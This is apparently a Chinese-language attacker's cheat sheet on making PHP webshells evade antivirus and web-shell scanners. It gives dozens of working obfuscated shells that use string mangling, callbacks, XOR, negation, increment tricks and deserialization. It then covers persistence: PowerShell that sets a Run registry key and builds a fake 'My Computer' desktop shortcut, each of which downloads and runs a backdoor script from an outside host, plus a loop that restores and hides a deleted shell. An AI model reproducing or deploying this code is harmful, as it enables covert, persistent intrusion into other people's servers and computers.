PHPWebshell免杀
0x01查杀原理
静态特征:字符 语义分析 (混淆)
客户端服务端交互流量日志(流量加密 + 混淆)
Opcode rasp技术
机器学习、深度学习算法(像正常php文件)
0x02免杀
字符串变形
ucwords() //函数把字符串中每个单词的首字符转换为大写。
ucfirst() //函数把字符串中的首字符转换为大写。
trim() //函数从字符串的两端删除空白字符和其他预定义字符。
substr_replace() //函数把字符串的一部分替换为另一个字符串
substr() //函数返回字符串的一部分。
strtoupper() //函数把字符串转换为大写。
strtolower() //函数把字符串转换为小写。
strtok() //函数把字符串分割为更小的字符串
base64_encode() 字符串base64编码
base64_decode() 字符串base64解码
urlencode() 字符串url编码
urldecode() 字符串url解码
bin2hex() 把 ASCII 字符的字符串转换为十六进制值。
hex2bin() 把十六进制值的字符串转换为 ASCII 字符。
chr() 从指定的 ASCII 值返回字符。
ord() 返回字符串中第一个字符的 ASCII 值。
explode() 把字符串打散为数组。
implode() 返回由数组元素组合成的字符串。
parse_str() 把查询字符串解析到变量中。
str_ireplace() 替换字符串中的一些字符(对大小写不敏感)。
str_replace() 替换字符串中的一些字符(对大小写敏感)。
str_repeat() 把字符串重复指定的次数。
str_rot13() 对字符串执行 ROT13 编码。
str_shuffle() 随机地打乱字符串中的所有字符。
str_split() 把字符串分割到数组中。
strip_tags() 剥去字符串中的 HTML 和 PHP 标签。
stripos() 返回字符串在另一字符串中第一次出现的位置(对大小写不敏感)。
stristr() 查找字符串在另一字符串中第一次出现的位置(大小写不敏感)。
strlen() 返回字符串的长度。
strpos() 返回字符串在另一字符串中第一次出现的位置(对大小写敏感)。
strrev() 反转字符串。
strripos() 查找字符串在另一字符串中最后一次出现的位置(对大小写不敏感)。
strrpos() 查找字符串在另一字符串中最后一次出现的位置(对大小写敏感)。
strstr() 查找字符串在另一字符串中的第一次出现(对大小写敏感)。注释
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]); // 密码-7自定义函数
<?php
function kdog($a){
$a($_POST['x']);
}
kdog(assert);
?>
<?php
function test($a){
$arr = array('a','s','s','e','r','t');
$func = '';
for($i=0;$i<count($arr);$i++) {
$func.=$func.$arr[$i];
}
$func=substr($func,-6);
$func($a);
}
test($_REQUEST['x']);
?>回调函数
call_user_func_array()
call_user_func()
array_filter()
array_walk()
array_map()
registregister_shutdown_function()
register_tick_function()
filter_var()
filter_var_array()
uasort()
uksort()
array_reduce()
array_walk()
array_walk_recursive()
<?php
forward_static_call_array(assert,array($_POST[x]));
?>
<?php
function test($a,$b){
array_map($a,$b);
}
test(assert,array($_POST['x']));
?>
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));特殊字符干扰(\ null ‘’)
<?php
function dog($a){
\assert($a);
}
dog($_POST[x]);
?>
<?php
$a = $_POST['a'];
$b = "\n";
eval($b.=$a);
?>
<?php
$name = $_GET['name'];
$name1=$name2= '';
eval($name1.$name2.$name);
?>
<?php
$a = $_GET['a'];
$c = null;
eval(''.$c.$a);
?>数组
<?php
$a = substr_replace("assexx","rt",4);
$b=[''=>$a($_POST['q'])];
?>
多维数组
<?php
$b = substr_replace("assexx","rt",4);
$a = array($arrayName = array('a' => $b($_POST['q'])));
?>
$sF = "PCT4BA6ODSE_";
$s21 = strtolower($sF[4] . $sF[5] . $sF[9] . $sF[10] . $sF[6] . $sF[3] . $sF[11] . $sF[8] . $sF[10] . $sF[1] . $sF[7] . $sF[8] . $sF[10]);
$s22 = ${strtoupper($sF[11] . $sF[0] . $sF[7] . $sF[9] . $sF[2])}['n985de9'];
if (isset($s22)) {
eval($s21($s22));
}类的析构
<?php
class me
{
public $a = '';
function __destruct(){
assert("$this->a");
}
}
$b = new me;
$b->a = $_POST['x'];
?>编码 异或 取反 自增
<?php
$a = base64_decode("YXNz+ZX____J____0");
$a($_POST[x]);
?>
异或
<?php
$a= ("!"^"@").'ssert';
$a($_POST[x]);
?>
<?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
$___=$$__;
$_($___[_]); // assert($_POST[_]);
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
$_=$$____;
$___(base64_decode($_[_])); // ASSERT($_POST[_]);
$y=~督耽孩^'(1987)';
$y($_POST[1987]);
上述的代码需要以GBK的方式保存,其中的$y的值为assert,这样就是一个典型的webshell了。
还有如下这种:
$x=~Ÿ¬¬º•«;
$x($_POST[~¹¹ÏÏÏÏ]);
上述的代码需要以ISO-8859-15保存,其中的$x为assert,而~¹¹ÏÏÏÏ是FF0000。$GPC
@eval($GLOBALS['_POST']['op']);
@eval($_FILE['name']);变量覆盖
<?php
$a=1;
$b=$_POST;
extract($b);
print_r(`$a`)?>
a=dir
<?php $a=1;$b="a=".$_GET['a'];parse_str($b);print_r(`$a`)?>Php7.1 之后的webshell
进制转换
$liner = "pr"."e"."g_"."re"."p"."l"."ace";
$liner("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28",php_code);
其中\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28其实为eval(gzuncompress(base64_decode(也达到了隐藏敏感函数的目的。反序列化
class foo{
public $data="text";
function __destruct()
{
eval($this->data);
}
}
$file_name=$_GET['id'];
unserialize($file_name);利用文件名
<?php
${"function"}=substr(__FILE__,-10,-4);;
${"command"}=$_POST[cmd];
$function($command);自定义加密
function decode($string) {
$result = '';
for($index=0;$index<strlen($string);$index += 1) {
$result .= chr(ord($string[$index])-3);
}
return $result;
}
$b = create_function('',decode("Chydo+'bSRVW^fpg`,>"));
$b();加密混淆工具
Screw phpjm,phpjiami weevely
0x03持久化
不死马
Php while
关闭apache 设置不可写 反不死马脚本
计划任务
At schtask/ crontab
Powershell
$autorunKeyName = "Windows Powershell"
$autorunKeyVal = "powershell.exe -nop -windowstyle hidden -exec bypass -c ""IEX (New-Object Net.WebClient).DownloadString('https://ub3r.cn/tools/backd00r/Backd00r-webshell.ps1');Backd00r-webshell.ps1"""
$autoruns = Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
if (-not $autoruns.$autorunKeyName) {
New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName -Value $autorunKeyVal
}
elseif($autoruns.$autorunKeyName -ne $autorunKeyVal) {
Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName
New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName -Value $autorunKeyVal
}
$shell_path = "G:\xampp\htdocs\backdoor\shell.php"
$shell_content = [System.IO.File]::ReadAllBytes($shell_path)
while($true){
$flag = Test-Path $shell_path
if($flag -eq "True"){ sleep 1 }
else{
[System.IO.File]::WriteAllBytes($shell_path, $shell_content)
$shell = Get-Item $shell_path
$shell.Attributes = "Readonly","system","notcontentindexed","hidden","archive"
sleep 1
}
}
powershell.exe -nop -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://ub3r.cn/tools/backd00r/Backd00r-webshell.ps1');Backd00r-webshell.ps1"
Function LNK_backdoor{
$Command = "powershell.exe -nop -windowstyle hidden -exec bypass -c ""IEX (New-Object Net.WebClient).DownloadString('https://ub3r.cn/tools/backd00r/Backd00r-webshell-Auto.ps1 ');Backd00r-webshell-Auto.ps1 """
##HIDE Computer Icon
$ErrorActionPreference = "SilentlyContinue"
If ($Error) {$Error.Clear()}
$RegistryPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
If (Test-Path $RegistryPath) {
$Res = Get-ItemProperty -Path $RegistryPath -Name "HideIcons"
If (-Not($Res)) {
New-ItemProperty -Path $RegistryPath -Name "HideIcons" -Value "0" -PropertyType DWORD -Force | Out-Null
}
$Check = (Get-ItemProperty -Path $RegistryPath -Name "HideIcons").HideIcons
If ($Check -NE 0) {
New-ItemProperty -Path $RegistryPath -Name "HideIcons" -Value "0" -PropertyType DWORD -Force | Out-Null
}
}
$RegistryPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons"
If (-Not(Test-Path $RegistryPath)) {
New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer" -Name "HideDesktopIcons" -Force | Out-Null
New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons" -Name "NewStartPanel" -Force | Out-Null
}
$RegistryPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel"
If (-Not(Test-Path $RegistryPath)) {
New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons" -Name "NewStartPanel" -Force | Out-Null
}
If (Test-Path $RegistryPath) {
## -- My Computer
$Res = Get-ItemProperty -Path $RegistryPath -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
If (-Not($Res)) {
New-ItemProperty -Path $RegistryPath -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" -Value "1" -PropertyType DWORD -Force | Out-Null
}
$Check = (Get-ItemProperty -Path $RegistryPath -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}")."{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
If ($Check -NE 1) {
New-ItemProperty -Path $RegistryPath -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" -Value "1" -PropertyType DWORD -Force | Out-Null
}
}
If ($Error) {$Error.Clear()}
##SHOW Computer Icon
#set-ItemProperty -Path 'HKCU:Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu' -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" -Value 0
#set-ItemProperty -Path 'HKCU:Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel' -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" -Value 0
#RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True
$Commandline = "/c explorer.exe /e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D} | "
$Command = $Commandline + $Command
$get_path=New-Object -ComObject WScript.Shell;
$path = $get_path.SpecialFolders.Item('Desktop')
$WshShell = New-Object -comObject WScript.Shell
$My_Computer = 17
$Shell = new-object -comobject shell.application
$NSComputer = $Shell.Namespace($My_Computer)
$name = $NSComputer.self.name
$Shortcut = $WshShell.CreateShortcut($path+"\"+$name+".lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.WindowStyle = 7
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,15"
$Shortcut.Arguments = ' '+ $Command
$Shortcut.Save()
refresh
}
Function refresh{
$source = @"
using System;
using System.Collections.Generic;
using System.Text;
using System.Runtime.InteropServices;
namespace FileEncryptProject.Algorithm
{
public class DesktopRefurbish
{
[DllImport("shell32.dll")]
public static extern void SHChangeNotify(HChangeNotifyEventID wEventId, HChangeNotifyFlags uFlags, IntPtr dwItem1, IntPtr dwItem2);
public static void DeskRef()
{
SHChangeNotify(HChangeNotifyEventID.SHCNE_ASSOCCHANGED, HChangeNotifyFlags.SHCNF_IDLIST, IntPtr.Zero, IntPtr.Zero);
}
}
#region public enum HChangeNotifyFlags
[Flags]
public enum HChangeNotifyFlags
{
SHCNF_DWORD = 0x0003,
SHCNF_IDLIST = 0x0000,
SHCNF_PATHA = 0x0001,
SHCNF_PATHW = 0x0005,
SHCNF_PRINTERA = 0x0002,
SHCNF_PRINTERW = 0x0006,
SHCNF_FLUSH = 0x1000,
SHCNF_FLUSHNOWAIT = 0x2000
}
#endregion//enum HChangeNotifyFlags
#region enum HChangeNotifyEventID
[Flags]
public enum HChangeNotifyEventID
{
SHCNE_ALLEVENTS = 0x7FFFFFFF,
SHCNE_ASSOCCHANGED = 0x08000000,
SHCNE_ATTRIBUTES = 0x00000800,
SHCNE_CREATE = 0x00000002,
SHCNE_DELETE = 0x00000004,
SHCNE_DRIVEADD = 0x00000100,
SHCNE_DRIVEADDGUI = 0x00010000,
SHCNE_DRIVEREMOVED = 0x00000080,
SHCNE_EXTENDED_EVENT = 0x04000000,
SHCNE_FREESPACE = 0x00040000,
SHCNE_MEDIAINSERTED = 0x00000020,
SHCNE_MEDIAREMOVED = 0x00000040,
SHCNE_MKDIR = 0x00000008,
SHCNE_NETSHARE = 0x00000200,
SHCNE_NETUNSHARE = 0x00000400,
SHCNE_RENAMEFOLDER = 0x00020000,
SHCNE_RENAMEITEM = 0x00000001,
SHCNE_RMDIR = 0x00000010,
SHCNE_SERVERDISCONNECT = 0x00004000,
SHCNE_UPDATEDIR = 0x00001000,
SHCNE_UPDATEIMAGE = 0x00008000,
}
#endregion
}
"@
Add-Type -TypeDefinition $source
[FileEncryptProject.Algorithm.DesktopRefurbish]::DeskRef()
}
LNK_backdoor最后更新于